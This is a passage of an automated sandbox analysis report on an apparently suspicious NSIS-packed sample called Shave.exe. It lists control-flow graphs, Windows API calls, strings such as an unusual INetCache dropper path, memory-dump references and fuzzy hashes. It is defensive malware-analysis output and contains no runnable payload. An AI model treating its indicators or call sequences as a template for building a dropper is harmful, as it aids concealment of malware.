                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2342217164.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                • String ID: "C:\Users\user\Desktop\Shave.exe"$(?z$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                                • API String ID: 2035342205-3354751149
                                                                                                                                • Opcode ID: 4d5656c0894c7074968c07a7ddfc43275556ff456bdda599b280e6413b0d544d
                                                                                                                                • Instruction ID: 8b5db7531a0f4bb83586dba503ceccc8cbbd7972abfd892cd346515476ce1415
                                                                                                                                • Opcode Fuzzy Hash: 4d5656c0894c7074968c07a7ddfc43275556ff456bdda599b280e6413b0d544d
                                                                                                                                • Instruction Fuzzy Hash: 7D41D830900918A6CF21AB65CC89ABF7678EF82718F14827FF801B11C1D77C5985DE6E

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 1077 4065da-4065ee FindFirstFileW 1078 4065f0-4065f9 FindClose 1077->1078 1079 4065fb 1077->1079 1080 4065fd-4065fe 1078->1080 1079->1080
                                                                                                                                APIs
                                                                                                                                • FindFirstFileW.KERNELBASE(?,007A4F70,C:\Users\user\AppData\Local\Temp\nsa5D43.tmp,00405CBD,C:\Users\user\AppData\Local\Temp\nsa5D43.tmp,C:\Users\user\AppData\Local\Temp\nsa5D43.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsa5D43.tmp,C:\Users\user\AppData\Local\Temp\nsa5D43.tmp,?,?,75923420,004059C9,?,C:\Users\user\AppData\Local\Temp\,75923420), ref: 004065E5
                                                                                                                                • FindClose.KERNEL32(00000000), ref: 004065F1
                                                                                                                                Strings
                                                                                                                                • C:\Users\user\AppData\Local\Temp\nsa5D43.tmp, xrefs: 004065DA
                                                                                                                                • pOz, xrefs: 004065DB
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2341855060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2341825897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341879473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2342217164.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Find$CloseFileFirst
                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nsa5D43.tmp$pOz
                                                                                                                                • API String ID: 2295610775-1393153450
                                                                                                                                • Opcode ID: e01e7619722b9f30efb83f7659fa0d40dd2a6717423703156fa95c420c1e82c9
                                                                                                                                • Instruction ID: b37c022bec08382a0cb03c9db181d2efdea8b1f21deeb05207148622359d6313
                                                                                                                                • Opcode Fuzzy Hash: e01e7619722b9f30efb83f7659fa0d40dd2a6717423703156fa95c420c1e82c9
                                                                                                                                • Instruction Fuzzy Hash: EFD01231519020AFC2001B38BD0C84B7A589F463307158B3AB4A6F11E4CB788C6296A9

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 261 403d35-403d47 262 403e88-403e97 261->262 263 403d4d-403d53 261->263 265 403ee6-403efb 262->265 266 403e99-403ee1 GetDlgItem * 2 call 40420e SetClassLongW call 40140b 262->266 263->262 264 403d59-403d62 263->264 267 403d64-403d71 SetWindowPos 264->267 268 403d77-403d7a 264->268 270 403f3b-403f40 call 40425a 265->270 271 403efd-403f00 265->271 266->265 267->268 273 403d94-403d9a 268->273 274 403d7c-403d8e ShowWindow 268->274 278 403f45-403f60 270->278 276 403f02-403f0d call 401389 271->276 277 403f33-403f35 271->277 279 403db6-403db9 273->279 280 403d9c-403db1 DestroyWindow 273->280 274->273 276->277 298 403f0f-403f2e SendMessageW 276->298 277->270 283 4041db 277->283 284 403f62-403f64 call 40140b 278->284 285 403f69-403f6f 278->285 289 403dbb-403dc7 SetWindowLongW 279->289 290 403dcc-403dd2 279->290 286 4041b8-4041be 280->286 288 4041dd-4041e4 283->288 284->285 294 403f75-403f80 285->294 295 404199-4041b2 DestroyWindow EndDialog 285->295 286->283 293 4041c0-4041c6 286->293 289->288 296 403e75-403e83 call 404275 290->296 297 403dd8-403de9 GetDlgItem 290->297 293->283 300 4041c8-4041d1 ShowWindow 293->300 294->295 301 403f86-403fd3 call 4062b9 call 40420e * 3 GetDlgItem 294->301 295->286 296->288 302 403e08-403e0b 297->302 303 403deb-403e02 SendMessageW IsWindowEnabled 297->303 298->288 300->283 331 403fd5-403fda 301->331 332 403fdd-404019 ShowWindow KiUserCallbackDispatcher call 404230 EnableWindow 301->332 306 403e10-403e13 302->306 307 403e0d-403e0e 302->307 303->283 303->302 310 403e21-403e26 306->310 311 403e15-403e1b 306->311 309 403e3e-403e43 call 4041e7 307->309 309->296 312 403e5c-403e6f SendMessageW 310->312 314 403e28-403e2e 310->314 311->312 313 403e1d-403e1f 311->313 312->296 313->309 317 403e30-403e36 call 40140b 314->317 318 403e45-403e4e call 40140b 314->318 327 403e3c 317->327 318->296 328 403e50-403e5a 318->328 327->309 328->327 331->332 335 40401b-40401c 332->335 336 40401e 332->336 337 404020-40404e GetSystemMenu EnableMenuItem SendMessageW 335->337 336->337 338 404050-404061 SendMessageW 337->338 339 404063 337->339 340 404069-4040a8 call 404243 call 403d16 call 406297 lstrlenW call 4062b9 SetWindowTextW call 401389 338->340 339->340 340->278 351 4040ae-4040b0 340->351 351->278 352 4040b6-4040ba 351->352 353 4040d9-4040ed DestroyWindow 352->353 354 4040bc-4040c2 352->354 353->286 356 4040f3-404120 CreateDialogParamW 353->356 354->283 355 4040c8-4040ce 354->355 355->278 357 4040d4 355->357 356->286 358 404126-40417d call 40420e GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 356->358 357->283 358->283 363 40417f-404197 ShowWindow call 40425a 358->363 363->286
                                                                                                                                APIs
                                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D71
                                                                                                                                • ShowWindow.USER32(?), ref: 00403D8E
                                                                                                                                • DestroyWindow.USER32 ref: 00403DA2
                                                                                                                                • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DBE
                                                                                                                                • GetDlgItem.USER32(?,?), ref: 00403DDF
                                                                                                                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DF3
                                                                                                                                • IsWindowEnabled.USER32(00000000), ref: 00403DFA
                                                                                                                                • GetDlgItem.USER32(?,00000001), ref: 00403EA8
                                                                                                                                • GetDlgItem.USER32(?,00000002), ref: 00403EB2
                                                                                                                                • SetClassLongW.USER32(?,000000F2,?), ref: 00403ECC
                                                                                                                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F1D
                                                                                                                                • GetDlgItem.USER32(?,00000003), ref: 00403FC3
                                                                                                                                • ShowWindow.USER32(00000000,?), ref: 00403FE4
                                                                                                                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403FF6
                                                                                                                                • EnableWindow.USER32(?,?), ref: 00404011
                                                                                                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404027
                                                                                                                                • EnableMenuItem.USER32(00000000), ref: 0040402E
                                                                                                                                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404046
                                                                                                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404059
                                                                                                                                • lstrlenW.KERNEL32(007A1F20,?,007A1F20,00000000), ref: 00404083
                                                                                                                                • SetWindowTextW.USER32(?,007A1F20), ref: 00404097
                                                                                                                                • ShowWindow.USER32(?,0000000A), ref: 004041CB
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2341855060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2341825897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341879473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2342217164.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3282139019-0
                                                                                                                                • Opcode ID: 47aca452d897ee1c606fef890413e6cfedcb511d419741730bd760ecf5135d2d
                                                                                                                                • Instruction ID: db2580999c41c4fe450d1ee4fd1a55221d51bf0aef153e7307bc2b2ec56299a6
                                                                                                                                • Opcode Fuzzy Hash: 47aca452d897ee1c606fef890413e6cfedcb511d419741730bd760ecf5135d2d
                                                                                                                                • Instruction Fuzzy Hash: 3FC1DEB2504200AFDB206F61ED48E2B3AA8EB9A745F01453FF651B11F0CB399991DB5E

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 366 403987-40399f call 406671 369 4039a1-4039ac GetUserDefaultUILanguage call 4061de 366->369 370 4039b3-4039ea call 406165 366->370 373 4039b1 369->373 376 403a02-403a08 lstrcatW 370->376 377 4039ec-4039fd call 406165 370->377 375 403a0d-403a36 call 403c5d call 405c74 373->375 383 403ac8-403ad0 call 405c74 375->383 384 403a3c-403a41 375->384 376->375 377->376 390 403ad2-403ad9 call 4062b9 383->390 391 403ade-403b03 LoadImageW 383->391 384->383 385 403a47-403a6f call 406165 384->385 385->383 392 403a71-403a75 385->392 390->391 394 403b84-403b8c call 40140b 391->394 395 403b05-403b35 RegisterClassW 391->395 397 403a87-403a93 lstrlenW 392->397 398 403a77-403a84 call 405b99 392->398 406 403b96-403ba1 call 403c5d 394->406 407 403b8e-403b91 394->407 399 403c53 395->399 400 403b3b-403b7f SystemParametersInfoW CreateWindowExW 395->400 404 403a95-403aa3 lstrcmpiW 397->404 405 403abb-403ac3 call 405b6c call 406297 397->405 398->397 403 403c55-403c5c 399->403 400->394 404->405 410 403aa5-403aaf GetFileAttributesW 404->410 405->383 418 403ba7-403bc1 ShowWindow call 406601 406->418 419 403c2a-403c32 call 4053d2 406->419 407->403 411 403ab1-403ab3 410->411 412 403ab5-403ab6 call 405bb8 410->412 411->405 411->412 412->405 426 403bc3-403bc8 call 406601 418->426 427 403bcd-403bdf GetClassInfoW 418->427 424 403c34-403c3a 419->424 425 403c4c-403c4e call 40140b 419->425 424->407 428 403c40-403c47 call 40140b 424->428 425->399 426->427 431 403be1-403bf1 GetClassInfoW RegisterClassW 427->431 432 403bf7-403c1a DialogBoxParamW call 40140b 427->432 428->407 431->432 436 403c1f-403c28 call 4038d7 432->436 436->403
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00406671: GetModuleHandleA.KERNEL32(?,00000020,?,004033DE,0000000A), ref: 00406683
                                                                                                                                  • Part of subcall function 00406671: GetProcAddress.KERNEL32(00000000,?), ref: 0040669E
                                                                                                                                • GetUserDefaultUILanguage.KERNELBASE(00000002,C:\Users\user\AppData\Local\Temp\,75923420,"C:\Users\user\Desktop\Shave.exe",00000000), ref: 004039A1
                                                                                                                                  • Part of subcall function 004061DE: wsprintfW.USER32 ref: 004061EB
                                                                                                                                • lstrcatW.KERNEL32(1033,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000,00000002,C:\Users\user\AppData\Local\Temp\,75923420,"C:\Users\user\Desktop\Shave.exe",00000000), ref: 00403A08
                                                                                                                                • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne,1033,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A88
                                                                                                                                • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne,1033,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000), ref: 00403A9B
                                                                                                                                • GetFileAttributesW.KERNEL32(Call), ref: 00403AA6
                                                                                                                                • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne), ref: 00403AEF
                                                                                                                                • RegisterClassW.USER32(007A79C0), ref: 00403B2C
                                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B44
                                                                                                                                • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B79
                                                                                                                                • ShowWindow.USER32(00000005,00000000), ref: 00403BAF
                                                                                                                                • GetClassInfoW.USER32(00000000,RichEdit20W,007A79C0), ref: 00403BDB
                                                                                                                                • GetClassInfoW.USER32(00000000,RichEdit,007A79C0), ref: 00403BE8
                                                                                                                                • RegisterClassW.USER32(007A79C0), ref: 00403BF1
                                                                                                                                • DialogBoxParamW.USER32(?,00000000,00403D35,00000000), ref: 00403C10
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2341855060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2341825897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341879473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2342217164.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                • String ID: "C:\Users\user\Desktop\Shave.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                • API String ID: 606308-804287154
                                                                                                                                • Opcode ID: d8c6d654d8461c0bab771826e12c99a28648eabf0d3796c1ab225da277d58302
                                                                                                                                • Instruction ID: fbef4646fbcf09e2f3785bbd11e1a9055ea34cd93d2d0ed92f9d0f486109358d
                                                                                                                                • Opcode Fuzzy Hash: d8c6d654d8461c0bab771826e12c99a28648eabf0d3796c1ab225da277d58302
                                                                                                                                • Instruction Fuzzy Hash: 4D61B434200700AED320AF669D45F2B3A6CEB86745F40857FF941B51E2DB7D6901CB2D

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 439 402edd-402f2b GetTickCount GetModuleFileNameW call 405d8d 442 402f37-402f65 call 406297 call 405bb8 call 406297 GetFileSize 439->442 443 402f2d-402f32 439->443 451 403052-403060 call 402e79 442->451 452 402f6b 442->452 444 40310f-403113 443->444 458 403062-403065 451->458 459 4030b5-4030ba 451->459 454 402f70-402f87 452->454 456 402f89 454->456 457 402f8b-402f94 call 40330e 454->457 456->457 466 402f9a-402fa1 457->466 467 4030bc-4030c4 call 402e79 457->467 461 403067-40307f call 403324 call 40330e 458->461 462 403089-4030b3 GlobalAlloc call 403324 call 403116 458->462 459->444 461->459 489 403081-403087 461->489 462->459 488 4030c6-4030d7 462->488 471 402fa3-402fb7 call 405d48 466->471 472 40301d-403021 466->472 467->459 478 40302b-403031 471->478 486 402fb9-402fc0 471->486 477 403023-40302a call 402e79 472->477 472->478 477->478 479 403040-40304a 478->479 480 403033-40303d call 406764 478->480 479->454 487 403050 479->487 480->479 486->478 492 402fc2-402fc9 486->492 487->451 493 4030d9 488->493 494 4030df-4030e4 488->494 489->459 489->462 492->478 495 402fcb-402fd2 492->495 493->494 496 4030e5-4030eb 494->496 495->478 497 402fd4-402fdb 495->497 496->496 498 4030ed-403108 SetFilePointer call 405d48 496->498 497->478 499 402fdd-402ffd 497->499 502 40310d 498->502 499->459 501 403003-403007 499->501 503 403009-40300d 501->503 504 40300f-403017 501->504 502->444 503->487 503->504 504->478 505 403019-40301b 504->505 505->478
                                                                                                                                APIs
                                                                                                                                • GetTickCount.KERNEL32 ref: 00402EEE
                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Shave.exe,00000400,?,00000006,00000008,0000000A), ref: 00402F0A
                                                                                                                                  • Part of subcall function 00405D8D: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\Shave.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D91
                                                                                                                                  • Part of subcall function 00405D8D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DB3
                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Shave.exe,C:\Users\user\Desktop\Shave.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F56
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2341855060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2341825897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341879473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2342217164.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                • String ID: "C:\Users\user\Desktop\Shave.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Shave.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$vy
                                                                                                                                • API String ID: 4283519449-3911791977
                                                                                                                                • Opcode ID: 3805bf358c9b933ceb9c43f9a1800ffe54feec6963a992abd6a8fc7691be1b71
                                                                                                                                • Instruction ID: 6efc7070ea8ae83888cd6b0cd51e2fb70848d81e0c864f736895acd6ba0a04dc
                                                                                                                                • Opcode Fuzzy Hash: 3805bf358c9b933ceb9c43f9a1800ffe54feec6963a992abd6a8fc7691be1b71
                                                                                                                                • Instruction Fuzzy Hash: 6251C271901208ABDB20AF65DD85BAE7FA8EB05355F10807BF904B62D5DB7C8E408B9D

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 783 4062b9-4062c4 784 4062c6-4062d5 783->784 785 4062d7-4062ed 783->785 784->785 786 4062f3-406300 785->786 787 406505-40650b 785->787 786->787 790 406306-40630d 786->790 788 406511-40651c 787->788 789 406312-40631f 787->789 791 406527-406528 788->791 792 40651e-406522 call 406297 788->792 789->788 793 406325-406331 789->793 790->787 792->791 795 4064f2 793->795 796 406337-406375 793->796 799 406500-406503 795->799 800 4064f4-4064fe 795->800 797 406495-406499 796->797 798 40637b-406386 796->798 801 40649b-4064a1 797->801 802 4064cc-4064d0 797->802 803 406388-40638d 798->803 804 40639f 798->804 799->787 800->787 805 4064b1-4064bd call 406297 801->805 806 4064a3-4064af call 4061de 801->806 808 4064d2-4064da call 4062b9 802->808 809 4064df-4064f0 lstrlenW 802->809 803->804 810 40638f-406392 803->810 807 4063a6-4063ad 804->807 821 4064c2-4064c8 805->821 806->821 812 4063b2-4063b4 807->812 813 4063af-4063b1 807->813 808->809 809->787 810->804 816 406394-406397 810->816 819 4063b6-4063dd call 406165 812->819 820 4063ef-4063f2 812->820 813->812 816->804 817 406399-40639d 816->817 817->807 831 4063e3-4063ea call 4062b9 819->831 832 40647d-406480 819->832 824 406402-406405 820->824 825 4063f4-406400 GetSystemDirectoryW 820->825 821->809 823 4064ca 821->823 827 40648d-406493 call 40652b 823->827 829 406470-406472 824->829 830 406407-406415 GetWindowsDirectoryW 824->830 828 406474-406478 825->828 827->809 828->827 834 40647a 828->834 829->828 833 406417-406421 829->833 830->829 831->828 832->827 839 406482-406488 lstrcatW 832->839 836 406423-406426 833->836 837 40643b-406451 SHGetSpecialFolderLocation 833->837 834->832 836->837 841 406428-40642f 836->841 842 406453-40646a SHGetPathFromIDListW CoTaskMemFree 837->842 843 40646c 837->843 839->827 845 406437-406439 841->845 842->828 842->843 843->829 845->828 845->837
                                                                                                                                APIs
                                                                                                                                • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004063FA
                                                                                                                                • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,007A0F00,?,00405336,007A0F00,00000000), ref: 0040640D
                                                                                                                                • SHGetSpecialFolderLocation.SHELL32(00405336,007924D8,00000000,007A0F00,?,00405336,007A0F00,00000000), ref: 00406449
                                                                                                                                • SHGetPathFromIDListW.SHELL32(007924D8,Call), ref: 00406457
                                                                                                                                • CoTaskMemFree.OLE32(007924D8), ref: 00406462
                                                                                                                                • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406488
                                                                                                                                • lstrlenW.KERNEL32(Call,00000000,007A0F00,?,00405336,007A0F00,00000000), ref: 004064E0
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2341855060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2341825897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341879473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
